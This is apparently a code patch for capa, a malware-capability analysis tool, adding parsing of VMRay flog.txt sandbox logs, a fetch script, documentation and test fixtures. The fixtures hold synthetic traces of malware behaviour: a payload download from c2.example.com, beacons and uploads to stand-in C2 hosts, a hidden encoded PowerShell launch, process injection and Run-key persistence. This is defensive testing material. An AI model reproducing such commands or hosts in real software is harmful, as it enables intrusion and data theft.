@classmethod
def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis":
    """
    Create an analysis object from a bare flog.txt, bypassing the ZIP-based constructor.

    flog.txt carries only the API trace, so the submission metadata is filled
    with placeholders (type "unknown", all-zero hashes, empty bytes) and the
    static tables (exports, imports, sections) are left empty.

    Raises UnsupportedFormatError when the parsed log version is not listed in
    SUPPORTED_FLOG_VERSIONS.
    """
    # __init__ takes an archive path, so allocate the instance without running it
    analysis = cls.__new__(cls)
    analysis.zipfile = None

    flog = flog_txt.parse_flog_txt_path(flog_txt_path)
    analysis.flog = flog
    log_version = flog.analysis.log_version
    if log_version not in SUPPORTED_FLOG_VERSIONS:
        raise UnsupportedFormatError("VMRay feature extractor does not support flog version %s" % log_version)

    # submission placeholders: the function log does not describe the sample itself
    display_name = flog_txt_path.name
    analysis.submission_type = "unknown"
    analysis.submission_name = display_name
    analysis.sv2 = SummaryV2(
        analysis_metadata=AnalysisMetadata(
            sample_type="unknown",
            submission_filename=display_name,
        ),
    )
    zero_hashes = FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64)
    analysis.submission_meta = File(
        hash_values=zero_hashes,
        is_sample=True,
        ref_static_data=None,
    )
    analysis.submission_sha256 = None
    analysis.submission_static = None
    analysis.submission_bytes = b""
    analysis.submission_base_address = None

    # static tables stay empty
    analysis.exports = {}
    analysis.imports = {}
    analysis.sections = {}

    # dynamic tables are populated from analysis.flog by the _compute_* helpers below
    analysis.monitor_processes = {}
    analysis.monitor_threads = {}
    analysis.monitor_threads_by_monitor_process = defaultdict(list)
    analysis.monitor_process_calls = defaultdict(lambda: defaultdict(list))

    for compute in (
        analysis._compute_monitor_processes,
        analysis._compute_monitor_threads,
        analysis._compute_monitor_process_calls,
    ):
        compute()
    return analysis
@classmethod
def from_flog_txt(cls, flog_txt_path: Path):
    """Construct the extractor around an analysis parsed from a standalone VMRay flog.txt (no ZIP). See #2452."""
    analysis = VMRayAnalysis.from_flog_txt(flog_txt_path)
    return cls(analysis)
+_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))') + + +def _parse_hex_or_decimal(s: str) -> int: + s = s.strip().strip('"') + if not s: + return 0 + if s.lower().startswith("0x"): + return int(s, 16) + return int(s, 10) + + +def _parse_properties(block: str) -> dict[str, Any]: + """Parse key = value lines from a Process/Thread/Region block.""" + result: dict[str, Any] = {} + for line in block.splitlines(): + line = line.strip() + if not line or " = " not in line: + continue + key, _, value = line.partition(" = ") + key = key.strip() + value = value.strip() + if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"): + result[key] = _parse_hex_or_decimal(value) + elif key in ("filename", "image_name", "cmd_line", "monitor_reason"): + result[key] = value.strip('"').replace("\\\\", "\\").strip() + else: + result[key] = value + return result + + +def _parse_args(args_str: str) -> Optional[Params]: + """ + Parse an API call's argument string into a Params object. + + Handles: name="quoted string", name=0xHEX, name=DECIMAL. + String values are modelled as void_ptr + str deref to match the XML extractor convention + so that String features are correctly yielded by the call feature extractor. + Numeric values use type unsigned_32bit so that Number features are yielded. + Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without + header definitions. + + Returns None if no parseable arguments are present. 
+ """ + if not args_str.strip(): + return None + params: list[Param] = [] + for m in _PARAM_RE.finditer(args_str): + name = m.group(1) + raw = m.group(2) + if raw.startswith('"'): + # String value — model as void_ptr with str deref (matches XML extractor convention) + str_val = raw[1:-1] + params.append( + Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}}) + ) + elif re.match(r"^0x[0-9a-fA-F]+$", raw) or raw.isdigit(): + # Numeric value — model as integer so Number features are yielded + params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw})) + # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable + if not params: + return None + return Params.model_validate({"param": params}) + + +def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: + """ + Parse one API trace line. Returns (api_name, args_str, return_value) or None. + Examples: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0083.567] CoTaskMemFree (pv=0x746aa0) + """ + line = line.strip() + if not line.startswith("["): + return None + # [timestamp] api_name (args) [returned rv] + match = re.match(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?", line) + if not match: + return None + _major, _minor, api_name, args, rv = match.groups() + args = args.strip() if args else "" + return_value: Optional[int] = None + if rv: + return_value = _parse_hex_or_decimal(rv) + return (api_name, args, return_value) + + +def _parse_thread_block( + block: str, thread_props: dict[str, Any] +) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]: + """Parse a Thread: block; return MonitorThread and collect events (caller adds them).""" + lines = block.splitlines() + events: list[tuple[str, str, Optional[int]]] = [] + for line in lines: + if 
def _parse_thread_block(
    block: str, thread_props: dict[str, Any]
) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]:
    """
    Turn one Thread: block into a MonitorThread plus its raw API events.

    Events are the (api_name, args_str, return_value) tuples produced by
    _parse_event; converting them to FunctionCall objects is left to the caller.
    Returns None when the properties carry neither "thread_id" nor "id".
    """
    trace_lines = (text for text in block.splitlines() if text.strip().startswith("["))
    events: list[tuple[str, str, Optional[int]]] = [
        parsed for parsed in map(_parse_event, trace_lines) if parsed
    ]

    thread_id = thread_props.get("thread_id") or thread_props.get("id")
    if thread_id is None:
        return None

    os_tid = thread_props.get("os_tid", 0)
    process_id = thread_props.get("process_id", 0)
    monitor_thread = MonitorThread(
        ts=0,
        thread_id=int(thread_id),
        process_id=int(process_id),
        os_tid=int(os_tid) if os_tid else 0,
    )
    return monitor_thread, events
def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]:
    """
    Parse one Process: block into its process, threads and function calls.

    Returns None when the block has no Thread: section or when the process
    properties carry no id. Function call ids count up from 1 within the block.
    """
    # everything before the first "Thread:" marker is process properties plus Region: blocks
    header_and_regions, *raw_thread_blocks = re.split(r"\n\s*Thread:\s*\n", block)
    if not raw_thread_blocks:
        return None  # no Thread: block found
    thread_blocks = [chunk for chunk in (raw.strip() for raw in raw_thread_blocks) if chunk]

    # process properties end where the first Region: block begins
    process_header = re.split(r"\n\s*Region:\s*\n", header_and_regions)[0]
    process_props = _parse_properties(process_header)
    process_id = process_props.get("id") or process_props.get("process_id")
    if process_id is None:
        return None

    monitor_process = MonitorProcess(
        ts=0,
        process_id=int(process_id),
        image_name=process_props.get("image_name", "").strip('"') or "unknown",
        filename=process_props.get("filename", "").strip('"') or "",
        os_pid=process_props.get("os_pid", 0) or 0,
        monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'),
        parent_id=int(process_props.get("parent_id", 0) or 0),
        os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0),
        cmd_line=process_props.get("cmd_line", "").strip('"') or "",
    )

    threads: list[MonitorThread] = []
    function_calls: list[FunctionCall] = []
    for thread_block in thread_blocks:
        thread_props = _parse_properties(thread_block)
        # threads do not name their owner; inherit it from the enclosing process
        thread_props["process_id"] = process_id
        parsed = _parse_thread_block(thread_block, thread_props)
        if parsed is None:
            continue
        mon_thread, events = parsed
        threads.append(mon_thread)
        for api_name, args_str, _rv in events:
            # built as a dict and validated because the "in" key is a Python keyword
            # and cannot be passed as a keyword argument
            call = {
                # exactly one call is appended per event, so this counts 1, 2, 3, ...
                "fncall_id": len(function_calls) + 1,
                "process_id": mon_thread.process_id,
                "thread_id": mon_thread.thread_id,
                # Linux kernel calls are logged as sys_<name>; drop the prefix
                "name": api_name.removeprefix("sys_"),
                "in": _parse_args(args_str),
                "out": None,
            }
            function_calls.append(FunctionCall.model_validate(call))

    return (monitor_process, threads, function_calls)
def parse_flog_txt(content: str) -> Flog:
    """
    Parse flog.txt content into the same Flog (Analysis) model used by the XML path.

    The leading run of "#" comment lines (blank lines allowed) is the header and
    must contain FLOG_TXT_VERSION_HEADER; otherwise UnsupportedFormatError is
    raised. The remainder is split into Process: blocks; blocks that
    _parse_process_block rejects are skipped. The result always reports
    log_version "1" and analyzer_version "flog.txt".
    """
    # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work
    if content.startswith("\ufeff"):
        content = content[1:]
    content = content.replace("\r\n", "\n").replace("\r", "\n")
    lines = content.splitlines()

    # The header ends at the first line that is neither blank nor a "#" comment
    header_end = next(
        (i for i, line in enumerate(lines) if line.strip() and not line.strip().startswith("#")),
        len(lines),
    )
    header = "\n".join(lines[:header_end])
    if FLOG_TXT_VERSION_HEADER not in header:
        raise UnsupportedFormatError(
            "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER
        )
    body = "\n".join(lines[header_end:]).strip()

    monitor_processes: list[MonitorProcess] = []
    monitor_threads: list[MonitorThread] = []
    function_calls: list[FunctionCall] = []

    # Split by "Process:" on its own line (allow optional whitespace). re.split always
    # returns at least one element, and a non-empty stripped body cannot begin with the
    # separator's newline, so no "nothing was split" fallback is needed.
    for block in re.split(r"\n\s*Process:\s*\n", body):
        block = block.strip()
        if not block:
            continue
        if block.startswith("Process:"):
            # The first block keeps its marker line because no newline precedes it in
            # the stripped body; drop that line.
            block = block.partition("\n")[2].strip()
            if not block:
                continue
        result = _parse_process_block(block)
        if result is None:
            continue  # skip malformed process block
        mon_process, threads, calls = result
        monitor_processes.append(mon_process)
        monitor_threads.extend(threads)
        function_calls.extend(calls)

    analysis = Analysis(
        log_version="1",
        analyzer_version="flog.txt",
        monitor_process=monitor_processes,
        monitor_thread=monitor_threads,
        fncall=function_calls,
    )
    return Flog(analysis=analysis)


def parse_flog_txt_path(path: Path) -> Flog:
    """Parse a flog.txt file from disk; bytes that are not valid UTF-8 are replaced, not fatal."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return parse_flog_txt(text)
sample.name.endswith(EXTENSIONS_FREEZE): @@ -307,9 +315,10 @@ def log_unsupported_vmray_report_error(error: str): logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09f..88a159af3 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) diff --git a/doc/usage.md b/doc/usage.md index 
6a207ed6f..d3ccfa8fd 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,10 +2,50 @@ See `capa -h` for all supported arguments and usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. 
+ +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. + +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. + +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 000000000..e9859056d --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
logger = logging.getLogger(__name__)

# ---------------------------------------------------------------------------
# VMRay REST API helpers
# ---------------------------------------------------------------------------

_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"

# Seconds to wait on the server per request; without an explicit timeout a
# requests call can block forever on an unresponsive host.
_DEFAULT_TIMEOUT = 60


def _session(url: str, apikey: str) -> requests.Session:
    """Return an authenticated requests.Session for the given VMRay instance."""
    s = requests.Session()
    s.headers.update(
        {
            "Authorization": f"api_key {apikey}",
            "Accept": "application/json",
        }
    )
    s.verify = True  # set to False only when using self-signed certificates
    # stash the instance root on the session so the helpers below can build URLs
    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
    return s


def _request(session: requests.Session, path: str, **kwargs) -> requests.Response:
    """GET `path` relative to the session's base URL and raise for HTTP error statuses."""
    # callers may still pass their own timeout; only the default is filled in
    kwargs.setdefault("timeout", _DEFAULT_TIMEOUT)
    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
    resp = session.get(url, **kwargs)
    resp.raise_for_status()
    return resp


def _get(session: requests.Session, path: str, **kwargs) -> dict:
    """GET `path` and return the decoded JSON body."""
    return _request(session, path, **kwargs).json()


def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
    """GET `path` and return the raw response body."""
    return _request(session, path, **kwargs).content


def lookup_sample(session: requests.Session, sha256: str) -> dict:
    """
    Return the VMRay sample record for the given SHA-256.
    Raises ValueError if the sample is not found.
    """
    data = _get(session, f"/rest/sample/sha256/{sha256}")
    if data.get("result") != "ok" or not data.get("data"):
        raise ValueError(f"sample not found on VMRay instance: {sha256}")
    # data["data"] is a list; take the first entry
    return data["data"][0]


def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
    """
    Return the analysis with the highest analysis_id for the given VMRay sample ID.

    No filtering on analysis state is applied. Raises ValueError if no analysis is found.
    """
    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
    analyses = data.get("data", [])
    if not analyses:
        raise ValueError(f"no analyses found for sample_id={sample_id}")
    # highest analysis_id is taken as newest; ties resolve to the earliest listed entry
    return max(analyses, key=lambda a: a.get("analysis_id", 0))


def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
    """
    Download the flog.txt content for the given VMRay analysis ID.

    The dedicated log export endpoint is tried first. If it answers with an HTTP
    error or an empty body, the analysis archive endpoint is queried with a
    ``file_filter[]`` parameter restricted to the function log, and that
    response body is returned unchanged.
    """
    # Try the dedicated log endpoint first (VMRay >= 2024.x)
    try:
        content = _get_bytes(
            session,
            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
        )
        if content:
            return content
    except requests.HTTPError as exc:
        # not fatal: older instances may lack this endpoint, so fall through
        logger.debug("flog export endpoint failed (%s); falling back to the archive endpoint", exc)

    # Fallback: download via the analysis archive with a file filter
    # NOTE(review): this presumably returns an archive container rather than the bare
    # text file — confirm against the VMRay API and unpack here if so.
    return _get_bytes(
        session,
        f"/rest/analysis/{analysis_id}/archive",
        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
    )
def main(argv=None):
    """
    Command-line entry point: look up a sample, download its flog.txt, optionally run capa.

    Returns a process exit status: 0 on success, 1 when the lookup, the download
    or launching capa fails, otherwise the exit status of the capa subprocess.
    """
    # local import: only needed for --capa-args handling
    import shlex

    if argv is None:
        argv = sys.argv[1:]

    parser = argparse.ArgumentParser(
        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
    )
    parser.add_argument(
        "--url",
        required=True,
        metavar="URL",
        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
    )
    parser.add_argument(
        "--apikey",
        required=True,
        metavar="KEY",
        help="VMRay REST API key (Settings → API Keys).",
    )
    parser.add_argument(
        "--sha256",
        required=True,
        metavar="SHA256",
        help="SHA-256 hash of the sample to analyse.",
    )
    parser.add_argument(
        "--output",
        metavar="PATH",
        help="Where to save the downloaded flog.txt. Defaults to SHA256_flog.txt in the current directory.",
    )
    parser.add_argument(
        "--run-capa",
        action="store_true",
        dest="run_capa",
        help="After downloading, run 'capa PATH' on the saved file and print the results.",
    )
    parser.add_argument(
        "--capa-args",
        metavar="ARGS",
        default="",
        help="Extra arguments forwarded to capa (only used with --run-capa).",
    )
    parser.add_argument(
        "--no-verify-ssl",
        action="store_false",
        dest="verify_ssl",
        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
    )
    parser.add_argument(
        "-d", "--debug", action="store_true", help="Enable debug logging."
    )
    args = parser.parse_args(argv)

    logging.basicConfig(
        level=logging.DEBUG if args.debug else logging.INFO,
        format="%(levelname)s: %(message)s",
    )

    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")

    session = _session(args.url, args.apikey)
    session.verify = args.verify_ssl  # type: ignore[assignment]

    # Step 1 — look up sample
    logger.info("looking up sample %s …", args.sha256)
    try:
        sample = lookup_sample(session, args.sha256)
    except (requests.HTTPError, ValueError) as exc:
        logger.error("failed to find sample: %s", exc)
        return 1

    sample_id: int = sample["sample_id"]
    logger.debug("found sample_id=%d", sample_id)

    # Step 2 — find the latest analysis
    logger.info("fetching analysis list for sample_id=%d …", sample_id)
    try:
        analysis = get_latest_analysis(session, sample_id)
    except (requests.HTTPError, ValueError) as exc:
        logger.error("failed to find analysis: %s", exc)
        return 1

    analysis_id: int = analysis["analysis_id"]
    logger.debug("using analysis_id=%d", analysis_id)

    # Step 3 — download flog.txt
    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
    try:
        flog_bytes = download_flog_txt(session, analysis_id)
    except requests.HTTPError as exc:
        logger.error("failed to download flog.txt: %s", exc)
        return 1

    if not flog_bytes:
        logger.error(
            "received empty response — flog.txt may not be available for this analysis"
        )
        return 1

    output_path.write_bytes(flog_bytes)
    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))

    # Step 4 (optional) — run capa
    if args.run_capa:
        # shlex keeps quoted values together, e.g. --capa-args "-r 'my rules'"
        capa_cmd = ["capa", str(output_path)] + shlex.split(args.capa_args)
        logger.info("running: %s", " ".join(capa_cmd))
        try:
            result = subprocess.run(capa_cmd)
        except FileNotFoundError:
            logger.error("could not launch capa: executable not found on PATH")
            return 1
        return result.returncode

    return 0
[0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 000000000..0948939b0 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + 
[0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 000000000..e7cab248a --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = 
"analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] 
GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 000000000..133d286fb --- /dev/null +++ 